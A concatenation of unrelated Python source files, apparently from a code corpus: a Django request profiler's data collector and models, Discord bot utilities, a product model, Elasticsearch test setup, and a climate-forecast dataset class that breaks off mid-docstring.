#### File: silk/silk/collector.py ```python from threading import local import cProfile, pstats, StringIO from six import with_metaclass from silk import models from silk.config import SilkyConfig from silk.errors import SilkNotConfigured, SilkInternalInconsistency from silk.models import _time_taken from silk.singleton import Singleton TYP_SILK_QUERIES = 'silk_queries' TYP_PROFILES = 'profiles' TYP_QUERIES = 'queries' class DataCollector(with_metaclass(Singleton, object)): """ Provides the ability to save all models at the end of the request. We cannot save during the request due to the possibility of atomic blocks and hence must collect data and perform the save at the end. """ def __init__(self): super(DataCollector, self).__init__() self.local = local() self._configure() @property def request(self): return getattr(self.local, 'request', None) def get_identifier(self): self.local.temp_identifier += 1 return self.local.temp_identifier @request.setter def request(self, value): self.local.request = value def _configure(self): self.local.objects = {} self.local.temp_identifier = 0 @property def objects(self): return getattr(self.local, 'objects', None) @property def queries(self): return self._get_objects(TYP_QUERIES) @property def silk_queries(self): return self._get_objects(TYP_SILK_QUERIES) def _get_objects(self, typ): objects = self.objects if objects is None: self._raise_not_configured('Attempt to access %s without initialisation.' % typ) if not typ in objects: objects[typ] = {} return objects[typ] @property def profiles(self): return self._get_objects(TYP_PROFILES) @property def silk_queries(self): return self._get_objects('silk_queries') def configure(self, request=None): self.request = request self._configure() if SilkyConfig().SILKY_PYTHON_PROFILER: self.pythonprofiler = cProfile.Profile() self.pythonprofiler.enable() def clear(self): self.request = None self._configure() def _raise_not_configured(self, err): raise SilkNotConfigured(err + ' Is the middleware installed correctly?') def register_objects(self, typ, *args): for arg in args: ident = self.get_identifier() objects = self.objects if objects is None: # This can happen if the SilkyMiddleware.process_request is not called for whatever reason. # Perhaps if another piece of middleware is not playing ball. self._raise_not_configured('Attempt to register object of type %s without initialisation. ') if not typ in objects: self.objects[typ] = {} self.objects[typ][ident] = arg def register_query(self, *args): self.register_objects(TYP_QUERIES, *args) def register_profile(self, *args): self.register_objects(TYP_PROFILES, *args) def _record_meta_profiling(self): if SilkyConfig().SILKY_META: num_queries = len(self.silk_queries) query_time = sum(_time_taken(x['start_time'], x['end_time']) for _, x in self.silk_queries.items()) self.request.meta_num_queries = num_queries self.request.meta_time_spent_queries = query_time self.request.save() def stop_python_profiler(self): if hasattr(self, 'pythonprofiler'): self.pythonprofiler.disable() def finalise(self): if hasattr(self, 'pythonprofiler'): s = StringIO.StringIO() ps = pstats.Stats(self.pythonprofiler, stream=s).sort_stats('cumulative') ps.print_stats() profile_text = s.getvalue() profile_text = "\n".join(profile_text.split("\n")[0:256]) # don't record too much because it can overflow the field storage size self.request.pyprofile = profile_text for _, query in self.queries.items(): query_model = models.SQLQuery.objects.create(**query) query['model'] = query_model for _, profile in self.profiles.items(): profile_query_models = [] if TYP_QUERIES in profile: profile_queries = profile[TYP_QUERIES] del profile[TYP_QUERIES] for query_temp_id in profile_queries: try: query = self.queries[query_temp_id] try: profile_query_models.append(query['model']) except KeyError: raise SilkInternalInconsistency('Profile references a query dictionary that has not ' 'been converted into a Django model. This should ' 'never happen, please file a bug report') except KeyError: raise SilkInternalInconsistency('Profile references a query temp_id that does not exist. ' 'This should never happen, please file a bug report') profile = models.Profile.objects.create(**profile) if profile_query_models: profile.queries = profile_query_models profile.save() self._record_meta_profiling() def register_silk_query(self, *args): self.register_objects(TYP_SILK_QUERIES, *args) ``` #### File: silk/silk/models.py ```python from collections import Counter import json from django.db import models from django.db.models import DateTimeField, TextField, CharField, ForeignKey, IntegerField, BooleanField, F, \ ManyToManyField, OneToOneField, FloatField from django.utils import timezone from django.db import transaction import sqlparse # Seperated out so can use in tests w/o models def _time_taken(start_time, end_time): d = end_time - start_time return d.seconds * 1000 + d.microseconds / 1000 def time_taken(self): return _time_taken(self.start_time, self.end_time) class CaseInsensitiveDictionary(dict): def __getitem__(self, key): return super(CaseInsensitiveDictionary, self).__getitem__(key.lower()) def __setitem__(self, key, value): super(CaseInsensitiveDictionary, self).__setitem__(key.lower(), value) def update(self, other=None, **kwargs): for k, v in other.items(): self[k] = v for k, v in kwargs.items(): self[k] = v def __init__(self, d): super(CaseInsensitiveDictionary, self).__init__() for k, v in d.items(): self[k] = v class Request(models.Model): path = CharField(max_length=300, db_index=True) query_params = TextField(blank=True, default='') raw_body = TextField(blank=True, default='') body = TextField(blank=True, default='') method = CharField(max_length=10) start_time = DateTimeField(default=timezone.now, db_index=True) view_name = CharField(max_length=300, db_index=True, blank=True, default='') end_time = DateTimeField(null=True, blank=True) time_taken = FloatField(blank=True, null=True) encoded_headers = TextField(blank=True, default='') meta_time = FloatField(null=True, blank=True) meta_num_queries = IntegerField(null=True, blank=True) meta_time_spent_queries = FloatField(null=True, blank=True) pyprofile = TextField(blank=True, default='') @property def total_meta_time(self): return (self.meta_time or 0) + (self.meta_time_spent_queries or 0) # defined in atomic transaction within SQLQuery save()/delete() as well # as in bulk_create of SQLQueryManager # TODO: This is probably a bad way to do this, .count() will prob do? num_sql_queries = IntegerField(default=0) @property def time_spent_on_sql_queries(self): # TODO: Perhaps there is a nicer way to do this with Django aggregates? # My initial thought was to perform: # SQLQuery.objects.filter.aggregate(Sum(F('end_time')) - Sum(F('start_time'))) # However this feature isnt available yet, however there has been talk for use of F objects # within aggregates for four years here: https://code.djangoproject.com/ticket/14030 # It looks like this will go in soon at which point this should be changed. return sum(x.time_taken for x in SQLQuery.objects.filter(request=self)) @property def headers(self): if self.encoded_headers: raw = json.loads(self.encoded_headers) else: raw = {} return CaseInsensitiveDictionary(raw) @property def content_type(self): return self.headers.get('content-type', None) def save(self, *args, **kwargs): if self.end_time and self.start_time: interval = self.end_time - self.start_time self.time_taken = interval.total_seconds() * 1000 super(Request, self).save(*args, **kwargs) class Response(models.Model): request = OneToOneField('Request', related_name='response', db_index=True) status_code = IntegerField() raw_body = TextField(blank=True, default='') body = TextField(blank=True, default='') encoded_headers = TextField(blank=True, default='') @property def content_type(self): return self.headers.get('content-type', None) @property def headers(self): if self.encoded_headers: raw = json.loads(self.encoded_headers) else: raw = {} return CaseInsensitiveDictionary(raw) class SQLQueryManager(models.Manager): def bulk_create(self, *args, **kwargs): """ensure that num_sql_queries remains consistent. Bulk create does not call the model save() method and hence we must add this logic here too""" if len(args): objs = args[0] else: objs = kwargs.get('objs') with transaction.commit_on_success(): request_counter = Counter([x.request_id for x in objs]) requests = Request.objects.filter(pk__in=request_counter.keys()) # TODO: Not that there is ever more than one request (but there could be eventually) # but perhaps there is a cleaner way of apply the increment from the counter without iterating # and saving individually? e.g. bulk update but with diff. increments. Couldn't come up with this # off hand. for r in requests: r.num_sql_queries = F('num_sql_queries') + request_counter[r.pk] r.save() save = super(SQLQueryManager, self).bulk_create(*args, **kwargs) return save class SQLQuery(models.Model): query = TextField() start_time = DateTimeField(null=True, blank=True, default=timezone.now) end_time = DateTimeField(null=True, blank=True) time_taken = FloatField(blank=True, null=True) request = ForeignKey('Request', related_name='queries', null=True, blank=True, db_index=True) traceback = TextField() objects = SQLQueryManager() @property def traceback_ln_only(self): return '\n'.join(self.traceback.split('\n')[::2]) @property def formatted_query(self): return sqlparse.format(self.query, reindent=True, keyword_case='upper') # TODO: Surely a better way to handle this? May return false positives @property def num_joins(self): return self.query.lower().count('join ') @property def tables_involved(self): """A rreally ather rudimentary way to work out tables involved in a query. TODO: Can probably parse the SQL using sqlparse etc and pull out table info that way?""" components = [x.strip() for x in self.query.split()] tables = [] for idx, c in enumerate(components): # TODO: If django uses aliases on column names they will be falsely identified as tables... if c.lower() == 'from' or c.lower() == 'join' or c.lower() == 'as': try: nxt = components[idx + 1] if not nxt.startswith('('): # Subquery stripped = nxt.strip().strip(',') if stripped: tables.append(stripped) except IndexError: # Reach the end pass return tables @transaction.commit_on_success() def save(self, *args, **kwargs): if self.end_time and self.start_time: interval = self.end_time - self.start_time self.time_taken = interval.total_seconds() * 1000 if not self.pk: if self.request: self.request.num_sql_queries += 1 self.request.save() super(SQLQuery, self).save(*args, **kwargs) @transaction.commit_on_success() def delete(self, *args, **kwargs): self.request.num_sql_queries -= 1 self.request.save() super(SQLQuery, self).delete(*args, **kwargs) class BaseProfile(models.Model): name = CharField(max_length=300, blank=True, default='') start_time = DateTimeField(default=timezone.now) end_time = DateTimeField(null=True, blank=True) request = ForeignKey('Request', null=True, blank=True, db_index=True) time_taken = FloatField(blank=True, null=True) class Meta: abstract = True def save(self, *args, **kwargs): if self.end_time and self.start_time: interval = self.end_time - self.start_time self.time_taken = interval.total_seconds() * 1000 super(BaseProfile, self).save(*args, **kwargs) class Profile(BaseProfile): file_path = CharField(max_length=300, blank=True, default='') line_num = IntegerField(null=True, blank=True) end_line_num = IntegerField(null=True, blank=True) func_name = CharField(max_length=300, blank=True, default='') exception_raised = BooleanField(default=False) queries = ManyToManyField('SQLQuery', related_name='profiles', db_index=True) dynamic = BooleanField(default=False) @property def is_function_profile(self): return self.func_name is not None @property def is_context_profile(self): return self.func_name is None @property def time_spent_on_sql_queries(self): time_spent = sum(x.time_taken for x in self.queries.all()) return time_spent ```
{ "source": "joshdavies14/apollo", "score": 3 }
#### File: apollo/utils/utils.py ```python from decimal import Decimal, InvalidOperation from typing import Iterable from config import CONFIG def user_is_irc_bot(ctx): return ctx.author.id == CONFIG.UWCS_DISCORD_BRIDGE_BOT_ID def get_name_string(message): # if message.clean_content.startswith("**<"): <-- FOR TESTING if user_is_irc_bot(message): return message.clean_content.split(" ")[0][3:-3] else: return f"{message.author.mention}" def is_decimal(num): try: Decimal(num) return True except (InvalidOperation, TypeError): return False def pluralise(l, word, single="", plural="s"): if len(l) > 1: return word + plural else: return word + single def filter_out_none(iterable: Iterable): return [i for i in iterable if i is not None] ```
{ "source": "joshdavies89/e-commerce", "score": 2 }
#### File: src/products/models.py ```python from django.db import models # Create your models here. class Product(models.Model): title = models.CharField(max_length=120) description = models.TextField(blank=True, null=True) price = models.DecimalField(decimal_places=2, max_digits=20) active = models.BooleanField(default=True) #slug #inventory def __unicode__(self): return self.title ```
{ "source": "joshdevins/eland", "score": 2 }
#### File: eland/tests/setup_tests.py ```python import pandas as pd from elasticsearch import helpers from eland.common import es_version from tests import ( ECOMMERCE_FILE_NAME, ECOMMERCE_INDEX_NAME, ECOMMERCE_MAPPING, ELASTICSEARCH_HOST, ES_TEST_CLIENT, FLIGHTS_FILE_NAME, FLIGHTS_INDEX_NAME, FLIGHTS_MAPPING, FLIGHTS_SMALL_FILE_NAME, FLIGHTS_SMALL_INDEX_NAME, TEST_MAPPING1, TEST_MAPPING1_INDEX_NAME, TEST_NESTED_USER_GROUP_DOCS, TEST_NESTED_USER_GROUP_INDEX_NAME, TEST_NESTED_USER_GROUP_MAPPING, ) DATA_LIST = [ (FLIGHTS_FILE_NAME, FLIGHTS_INDEX_NAME, FLIGHTS_MAPPING), (FLIGHTS_SMALL_FILE_NAME, FLIGHTS_SMALL_INDEX_NAME, FLIGHTS_MAPPING), (ECOMMERCE_FILE_NAME, ECOMMERCE_INDEX_NAME, ECOMMERCE_MAPPING), ] def _setup_data(es): # Read json file and index records into Elasticsearch for data in DATA_LIST: json_file_name = data[0] index_name = data[1] mapping = data[2] # Delete index print("Deleting index:", index_name) es.indices.delete(index=index_name, ignore=[400, 404]) print("Creating index:", index_name) es.indices.create(index=index_name, body=mapping) df = pd.read_json(json_file_name, lines=True) actions = [] n = 0 print("Adding", df.shape[0], "items to index:", index_name) for index, row in df.iterrows(): values = row.to_dict() # make timestamp datetime 2018-01-01T12:09:35 # values['timestamp'] = datetime.strptime(values['timestamp'], '%Y-%m-%dT%H:%M:%S') # Use integer as id field for repeatable results action = {"_index": index_name, "_source": values, "_id": str(n)} actions.append(action) n = n + 1 if n % 10000 == 0: helpers.bulk(es, actions) actions = [] helpers.bulk(es, actions) actions = [] print("Done", index_name) def _update_max_compilations_limit(es, limit="10000/1m"): print("Updating script.max_compilations_rate to ", limit) if es_version(es) < (7, 8): body = {"transient": {"script.max_compilations_rate": limit}} else: body = { "transient": { "script.max_compilations_rate": "use-context", "script.context.field.max_compilations_rate": limit, } } es.cluster.put_settings(body=body) def _setup_test_mappings(es): # Create a complex mapping containing many Elasticsearch features es.indices.delete(index=TEST_MAPPING1_INDEX_NAME, ignore=[400, 404]) es.indices.create(index=TEST_MAPPING1_INDEX_NAME, body=TEST_MAPPING1) def _setup_test_nested(es): es.indices.delete(index=TEST_NESTED_USER_GROUP_INDEX_NAME, ignore=[400, 404]) es.indices.create( index=TEST_NESTED_USER_GROUP_INDEX_NAME, body=TEST_NESTED_USER_GROUP_MAPPING ) helpers.bulk(es, TEST_NESTED_USER_GROUP_DOCS) if __name__ == "__main__": # Create connection to Elasticsearch - use defaults print("Connecting to ES", ELASTICSEARCH_HOST) es = ES_TEST_CLIENT _setup_data(es) _setup_test_mappings(es) _setup_test_nested(es) _update_max_compilations_limit(es) ```
{ "source": "joshdickie/image-shuffler", "score": 4 }
#### File: joshdickie/image-shuffler/image-shuffler.py ```python import random, string, os, math from tkinter import * from tkinter import ttk, messagebox from PIL import Image #window root = Tk() root.title("Random Image Grid Generator") root.resizable(0, 0) #################################### VARS #################################### dir_path = os.path.dirname(os.path.realpath(__file__)) text_intro = ("This program takes a number of images of two distinct types, " "and randomly arranges a selection of them in a grid. Please " "ensure that the input images are placed in the appropriate " "folder, are named appropriately, and are the same size.") text_matrix_number = "Number of matrices:" text_image_type_a = "Number of images of type a to be selected:" text_image_type_b = "Number of images of type b to be selected:" images_a = [] #list of image type a paths images_b = [] #list of image type b paths images_total = [] #combined list of paths padding = 10 #space between images on grid image_x = 0 #how many pixels wide the images are image_y = 0 #how many pixels high the images are matrix_x_pix = 0 #how many pixels wide the matrix is matrix_y_pix = 0 #how many pixels high the matrix is matrix_x = 0 #how many images wide the matrix is matrix_y = 0 #how many images high the matrix is #Tkinter objects number_of_matrices = StringVar() number_of_images_a = StringVar() number_of_images_b = StringVar() ################################### FUNCTS ################################### def main(): """ generates a number (determined by the user) of randomized image matrices (of size determined by the user), and saves them to an "output" folder. """ global matrix_x, matrix_y if inputs_valid(): if number_of_images_b.get() != "": #check if images_b empty matrix_size = (int(number_of_images_a.get()) + int(number_of_images_b.get())) else: matrix_size = int(number_of_images_a.get()) size_prime, matrix_x, matrix_y = square_distribution(matrix_size) if size_prime: messagebox.showwarning("Grid can not be constructed", ( "Error: grid of requested size can not be" "constructed (type a + type b is prime)")) else: generate_image_matrices() messagebox.showinfo("","done.") def inputs_valid(): """ checks that all inputs are valid, including: - user entries - images """ if entries_valid() and number_of_images_valid(): return True else: return False def entries_valid(): """ verifies that user iput is valid for: - Matrix size (x and y) - Number of matrices """ if ((number_of_matrices.get()).isdigit() and (number_of_images_a.get()).isdigit() and ((number_of_images_b.get()).isdigit() or (number_of_images_b.get() is ""))): return True else: messagebox.showwarning("Invalid entries", ( "All input values must be " "non-negative integers.")) return False def number_of_images_valid(): """ verifies that the number of images in the "type a" input folder is greater than or equal to number_of_images_a. Does the same for type b. """ if number_of_images_a_valid() and number_of_images_b_valid(): return True else: return False def number_of_images_a_valid(): """ verifies that the number of images in the "type a" input folder is greater than or equal to number_of_images_a. """ counter = 0 with os.scandir(os.path.join(dir_path, "inputs", "type_a")) as filepaths: for path in filepaths: extension = os.path.splitext(path)[1].lower() if extension == ".png" or extension == ".jpg": counter += 1 if counter >= int(number_of_images_a.get()): return True else: messagebox.showwarning("Invalid Image Inputs", ( "Not enough images of type a to create " "requested grid.")) return False def number_of_images_b_valid(): """ verifies that the number of images in the "type b" input folder is greater than or equal to number_of_images_b. """ counter = 0 with os.scandir(os.path.join(dir_path, "inputs", "type_b")) as filepaths: for path in filepaths: extension = os.path.splitext(path)[1].lower() if extension == ".png" or extension == ".jpg": counter += 1 if ((number_of_images_b.get() == "") or (counter >= int(number_of_images_b.get()))): return True else: messagebox.showwarning("Invalid Image Inputs", ( "Not enough images of type b to create " "requested grid.")) return False def square_distribution(size): """ Determines the "most square" x and y values which will make a grid of the specified size. args: size - the size of the grid (int) returns: size_prime - True if size is prime (bool) x - the x value of the most square distribution (int) y - the y value of the most square distribution (int) """ x = math.ceil(math.sqrt(size)) while x < size: if size % x != 0: x += 1 else: break y = size//x if x == size: size_prime = True else: size_prime = False return (size_prime, x, y) def generate_image_matrices(): """ generates and saves the specified number of matrices, using the given input data. """ for i in range(int(number_of_matrices.get())): clear_space() populate_image_lists() randomly_select_images() get_image_data() grid_frame = Image.new("RGB", (matrix_x_pix, matrix_y_pix), "white") image_index = 0 for j in range(matrix_x): for k in range(matrix_y): img = Image.open(images_total[image_index]) grid_frame.paste(img, (padding + (j * (padding + image_x)), padding + (k * (padding + image_y)))) image_index += 1 save_path = (os.path.join(dir_path, "outputs\\") + number_of_images_a.get() + "a" + number_of_images_b.get() + "b_img" + str(i) + ".png") grid_frame.save(save_path, "PNG") def clear_space(): """ clears the workspace for a new run """ global images_a, images_b, images_total images_a = [] images_b = [] images_total = [] def populate_image_lists(): """ populates images_a and images_b with the appropriate paths. """ with os.scandir(os.path.join(dir_path, "inputs", "type_a")) as filepaths: for path in filepaths: extension = os.path.splitext(path)[1].lower() if extension == ".png" or extension == ".jpg": images_a.append(path.path) with os.scandir(os.path.join(dir_path, "inputs", "type_b")) as filepaths: for path in filepaths: extension = os.path.splitext(path)[1].lower() if extension == ".png" or extension == ".jpg": images_b.append(path.path) def randomly_select_images(): """ combines images_a and images_b by randomly selecting the images which will be used to generate the image grid, then shuffling the combined list. """ global images_a, images_b, images_total images_a = random.sample(images_a, int(number_of_images_a.get())) if number_of_images_b.get() != "": #check if images_b empty images_b = random.sample(images_b, int(number_of_images_b.get())) else: images_b = [] images_total = images_a + images_b random.shuffle(images_total) def get_image_data(): """ gets relevant image data: - size (width and height) of images - size (width and height) of the grid """ global image_x, image_y, matrix_x_pix, matrix_y_pix image_x, image_y = Image.open(images_total[0]).size matrix_x_pix = (matrix_x*image_x) + ((matrix_x + 1) * padding) matrix_y_pix = (matrix_y*image_y) + ((matrix_y + 1) * padding) ################################## GUI STUFF ################################# #Widgets frame_intro = ttk.Frame(root, padding = 5, borderwidth = 2, relief = SUNKEN) frame_inputs = ttk.Frame(root) label_intro = ttk.Label(frame_intro, text = text_intro, justify = CENTER, wraplength = 450) label_matrix_number = ttk.Label(frame_inputs, text = text_matrix_number, justify = RIGHT) label_image_type_a = ttk.Label(frame_inputs, text = text_image_type_a, justify = RIGHT) label_image_type_b = ttk.Label(frame_inputs, text = text_image_type_b, justify = RIGHT) entry_matrix_number = ttk.Entry(frame_inputs, textvariable = number_of_matrices, width = 4) entry_image_type_a = ttk.Entry(frame_inputs, textvariable = number_of_images_a, width = 4) entry_image_type_b = ttk.Entry(frame_inputs, textvariable = number_of_images_b, width = 4) button_go = ttk.Button(frame_inputs, text = "Go", command = main) #Placement frame_intro.grid(column = 1, row = 1, sticky = (N, S, E, W)) frame_inputs.grid(column = 1, row = 2, sticky = (N, S, E, W)) label_intro.grid(column = 1, row = 1, columnspan = 4, sticky = (N, S, E, W)) label_matrix_number.grid(column = 1, row = 3, sticky = E) label_image_type_a.grid(column = 1, row = 4, sticky = E) label_image_type_b.grid(column = 1, row = 5, sticky = E) entry_matrix_number.grid(column = 2, row = 3) entry_image_type_a.grid(column = 2, row = 4) entry_image_type_b.grid(column = 2, row = 5) button_go.grid(column = 5, row = 6) #Main Loop root.mainloop() ```
{ "source": "joshdk/mtls-server", "score": 3 }
#### File: joshdk/mtls-server/server.py ```python from configparser import ConfigParser import os import json from cryptography.hazmat.primitives import serialization from flask import Flask from flask import request from cert_processor import CertProcessor from cert_processor import CertProcessorKeyNotFoundError from cert_processor import CertProcessorInvalidSignatureError from cert_processor import CertProcessorUntrustedSignatureError from handler import Handler from logger import logger from utils import get_config_from_file __author__ = "<NAME> <<EMAIL>>" app = None handler = None def create_app(config=None): app = Flask(__name__) handler = Handler(config) with open("VERSION", "r") as f: version = str(f.readline().strip()) # This will generate a CA Certificate and Key if one does not exist try: cert = handler.cert_processor.get_ca_cert() except CertProcessorKeyNotFoundError: # Auto-gen a new key and cert if one is not presented and this is the # first call ever made to the handler key = handler.cert_processor.get_ca_key() cert = handler.cert_processor.get_ca_cert(key) @app.route("/", methods=["POST"]) def create_handler(): body = request.get_json() if body["type"] == "CERTIFICATE": return handler.create_cert(body) if body["type"] == "USER": return handler.add_user(body) if body["type"] == "ADMIN": return handler.add_user(body, is_admin=True) @app.route("/", methods=["DELETE"]) def delete_handler(): body = request.get_json() if body["type"] == "CERTIFICATE": return handler.revoke_cert(body) if body["type"] == "USER": return handler.remove_user(body) if body["type"] == "ADMIN": return handler.remove_user(body, is_admin=True) @app.route("/ca", methods=["GET"]) def get_ca_cert(): cert = handler.cert_processor.get_ca_cert() cert = cert.public_bytes(serialization.Encoding.PEM).decode("UTF-8") return ( json.dumps({"issuer": handler.config.get("ca", "issuer"), "cert": cert}), 200, ) @app.route("/crl", methods=["GET"]) def get_crl(): crl = handler.cert_processor.get_crl() return crl.public_bytes(serialization.Encoding.PEM).decode("UTF-8") @app.route("/version", methods=["GET"]) def get_version(): return json.dumps({"version": version}), 200 return app if __name__ == "__main__": config_path = os.getenv("CONFIG_PATH", None) if config_path: config = get_config_from_file(config_path) else: config = get_config_from_file("config.ini") app = create_app(config) app.run(port=config.get("mtls", "port", fallback=4000)) ```
{ "source": "joshdoman/twitter-legitimacy", "score": 3 }
#### File: backend/functions/SecondDegreeTwitter.py ```python import json import sys from FollowersAPI import get_followers_for_id, get_following_for_id from UserAPI import get_user_info def get_overlap(users1, users2): user_ids = set() for user in users1: user_ids.add(user['id']) overlap = list() for user in users2: user_id = user['id'] if user_id in user_ids: overlap.append(user) return overlap def get_users_you_follow_that_follow_me(my_id, your_id): my_followers = get_followers_for_id(my_id) sys.getsizeof(json.dump(my_followers)) your_following = get_following_for_id(your_id) return get_overlap(my_followers, your_following) def get_users_you_follow_that_follow_me_using_handles(my_username, your_username): users = get_user_info([my_username, your_username]) my_user_id = users['data'][0]['id'] your_user_id = users['data'][1]['id'] return get_users_you_follow_that_follow_me(my_user_id, your_user_id) def get_users_who_follow_you_and_me(my_username, your_username): users = get_user_info([my_username, your_username]) my_user_id = users['data'][0]['id'] your_user_id = users['data'][1]['id'] my_followers = get_followers_for_id(my_user_id) your_followers = get_followers_for_id(your_user_id) return get_overlap(my_followers, your_followers) if __name__ == "__main__": # my_username = "AlanaDLevin" # your_username = "nishitaARK" # print("Users that {} follows that follow {}".format(your_username, my_username)) # users = get_users_you_follow_that_follow_me_using_handles(my_username, your_username) # for user in users: # print("{} ({})".format(user['name'], user['username'])) # print("") my_username = "nishitaARK" your_username = "AlanaDLevin" print("Users that {} follows that follow {}".format(your_username, my_username)) users = get_users_you_follow_that_follow_me_using_handles(my_username, your_username) for user in users: print("{} ({})".format(user['name'], user['username'])) ``` #### File: twitter-legitimacy/backend/handler.py ```python import boto3 import json import time import os from botocore.exceptions import ClientError from functions.UserAPI import get_user_info from functions.FollowersAPI import get_followers_for_id, get_following_for_id # Import DynamoDB s3 = boto3.client('s3') # Import Environment Variables followersBucket = os.environ['FOLLOWERS_BUCKET'] followingBucket = os.environ['FOLLOWING_BUCKET'] cacheDuration = os.environ['CACHE_DURATION'] # -------- Helper Functions -------- def get_overlap(users1, users2): user_ids = set() for user in users1: user_ids.add(user['id']) overlap = list() for user in users2: user_id = user['id'] if user_id in user_ids: overlap.append(user) return overlap # -------- DynamoDB Functions -------- def get_cached_followers(userID): try: print(followersBucket) print(userID) data = s3.get_object(Bucket=followersBucket, Key=userID) followers = data.get('Body').read().decode('utf-8') return json.loads(followers) except ClientError as e: print("ClientError: %s" % e) return None def get_cached_following(userID): try: print(followingBucket) print(userID) data = s3.get_object(Bucket=followingBucket, Key=userID) following = data.get('Body').read().decode('utf-8') return json.loads(following) except ClientError as e: print("ClientError: %s" % e) return None def cache_followers(userID, followers): s3.put_object( Body=json.dumps(followers), Bucket=followersBucket, Key=userID ) def cache_following(userID, following): s3.put_object( Body=json.dumps(following), Bucket=followingBucket, Key=userID ) # -------- Main Function (Start) -------- def followsMyFollowers(event, context): params = json.loads(event['body']) source_user = params['source_user'] target_user = params['target_user'] return followsMyFollowersHelper(source_user, target_user) def followsMyFollowersHelper(source_user, target_user): try: print("{} looking up {}".format(source_user, target_user)) # 1. Remove '@' from string (user can input "@handle" or "handle") source_user = source_user.replace("@","") target_user = target_user.replace("@","") # 2. Get user info for the source and target users (id, name, profile_url) user_info = get_user_info([source_user, target_user])['data'] source_user_info = user_info[0] target_user_info = user_info[1] source_id = source_user_info['id'] target_id = target_user_info['id'] # 3. Get followers of source user (look up in cache first) source_followers = get_cached_followers(source_id) if source_followers is None: source_followers = get_followers_for_id(source_id) cache_followers(source_id, source_followers) # 4. Get users that target follows (look up in cache first) target_following = get_cached_following(target_id) if target_following is None: target_following = get_following_for_id(target_id) cache_following(target_id, target_following) # 5. Get users that target follows that follow source users = get_overlap(source_followers, target_following) # 6. Return response body = { "source": source_user_info, "target": target_user_info, "followers_followed": users, } response = { "statusCode": 200, "headers": { 'Access-Control-Allow-Origin': '*', 'Access-Control-Allow-Credentials': True, }, "body": json.dumps(body, indent=4) } return response except Exception as e: if 'Request returned an error: 429' in e: response = { "statusCode": 429, "headers": { 'Access-Control-Allow-Origin': '*', 'Access-Control-Allow-Credentials': True, }, "body": "Too Many Requests" } return response else: response = { "statusCode": 400, "headers": { 'Access-Control-Allow-Origin': '*', 'Access-Control-Allow-Credentials': True, }, "body": "Something went wrong" } return response # -------- Test Function -------- def followsMyFollowersTest(event, context): source_user = "AlanaDLevin" target_user = "nishitaARK" return followsMyFollowersHelper(source_user, target_user) ```
{ "source": "joshdorrington/Iris4cast", "score": 3 }
#### File: joshdorrington/Iris4cast/Iris4cast.py ```python import iris import copy as cp import datetime as dt import iris.coord_categorisation as iccat from iris.analysis.cartography import cosine_latitude_weights import numpy as np import cf_units import os class Dataset: def __init__(self,field,dates,leads=None): """ Dataset is the base class shared by all analysis and forecast data sets. It defines all functions that are generic between datasets. Not normally used directly. Args: * field - A string used to identify which fields to load from file. *date - a list or tuple of 2 datetime.datetime objects specifying the first and last datetime to include in the data *leads - used by the Forecast class only, a list or tuple of 2 floats, specifying minimum and maximum lead times in days to include. """ self.field=field self.dates=dates self._d_l,self._d_u=dates self.leads=leads #Only data of the same forecast hour is currently supported. assert dates[0].hour==dates[1].hour self.hour=[dates[0].hour] #Name of the primary time coordinate self.T="time" #The expected position of the primary time coordinate in the cube self.t=0 #The day of year associated with 'dates' self.calendar_bounds=[d.timetuple().tm_yday for d in dates] self.type=Dataset #A dictionary that can contain any number of iris CubeLists, each #labelled with a keyword. The load_data method generates a "data" and #a "clim" CubeList self.data={} #Used by the get_climatology method self.dist_means=None self.distribution=None #The time unit to use self.U=cf_units.Unit(f"Days since {cf_units.EPOCH}",\ calendar=cf_units.CALENDAR_GREGORIAN) #Constraints applied to the data at different points. self.constraints={ #keep only data with a valid time coordinate "load":iris.Constraint(cube_func=lambda cube: cube.coords(self.T)!=[]), #keep only data that falls within the calendar_bounds "calendar":iris.Constraint(coord_values={"day_of_year":lambda cell:\ self._in_calendar_bounds(cell)}), #keep only data for the right hour "hour":iris.Constraint(coord_values={"hour":lambda cell:\ np.isin(cell,self.hour)[0]}), #keep only data that falls within the dates "data":iris.Constraint(coord_values={self.T:lambda cell:\ self._d_l<=cell<=self._d_u}), #keep only data that falls outside the dates "clim":iris.Constraint(coord_values={self.T:lambda cell:\ (self._d_l>cell)or (cell>self._d_u)}) } self._setup() def _setup(self): """empty method used by derived classes.""" pass def set_path(self,path): """set the path from which to load data""" if os.path.isdir(path): self.path=path else: raise(ValueError("Not a valid path.")) def copy(self): """A method which returns a copy of the Dataset""" copy=self.type(self.field,self.dates,self.leads) copy.dist_means=self.dist_means copy.distribution=self.distribution copy.data=cp.deepcopy(self.data) return copy def add_constraints(self,constr_dict): """add a dictionary of constraints 'constr_dict' to the constraints attribute. Any previously defined keywords will be overwritten.""" for key in constr_dict: self.constraints[key]=constr_dict[key] def load_data(self,strict=True): """Load data from self.path as a list of iris cubes, preprocess it, and split it into two CubeLists "data" and "clim". """ CL=iris.cube.CubeList() fs=[self.path+f for f in os.listdir(self.path) if f.endswith(".nc")] for f in fs: CL.append(iris.load_cube(f,constraint=self.constraints["load"])) self.data=CL self._clean_loaded_data() a=self.data.extract(self.constraints["data"]) c=self.data.extract(self.constraints["clim"]) if strict: if a is None: raise(ValueError("No data after applying constraints.")) if c is None: raise(ValueError("No climatology data after applying constraints.")) self.data={"data":a,"clim":c} def _clean_loaded_data(self): """empty method used by derived classes.""" pass def _in_calendar_bounds(self,x): """Evaluates whether a real number x lies between the calendar_bounds of the dataset, wrapping around the end of the year if necessary.""" c0,c1=self.calendar_bounds if c1<c0: ans=(x<=c1) or (x>=c0) else: ans=(x<=c1) and (x>=c0) return ans def restrict_area(self,region): """A convenience method that restricts the spatial extent of the Dataset to one of a few preset domains, defined by a string "region". """ if region.lower()=="europe": lons=[-15,20] lats=[32,60] elif region.lower()=="france": lons=[-5,8] lats=[42,51] elif region.lower()=="north_atlantic": lons=[-80,40] lats=[30,90] else: raise(ValueError(f"Unrecognised region {region}.")) #We use this over intersection, because it works for cubelists area_constr=iris.Constraint(longitude=lambda x: lons[0]<=x<=lons[1],\ latitude=lambda x: lats[0]<=x<=lats[1]) for key in self.data: self.data[key]=self.data[key].extract(area_constr) def add_cat_coord(self,iccat_function,coordname,base_coord): """Adds a categorical coordinate to all cubes in Dataset.data, defined by 'iccat_function' relative to 'base_coord', and called 'coordname'. Note that the name of the new coord is defined internally by iccat_function; coordname serves only to graciously handle the case when that coordinate already exists.""" for key in self.data: for i,entry in enumerate(self.data[key]): if entry.coords(coordname)==[]: iccat_function(entry,base_coord) def change_units(self,unit_str=None,cf_unit=None): """Changes the units of all cubes in the Dataset to a new unit given 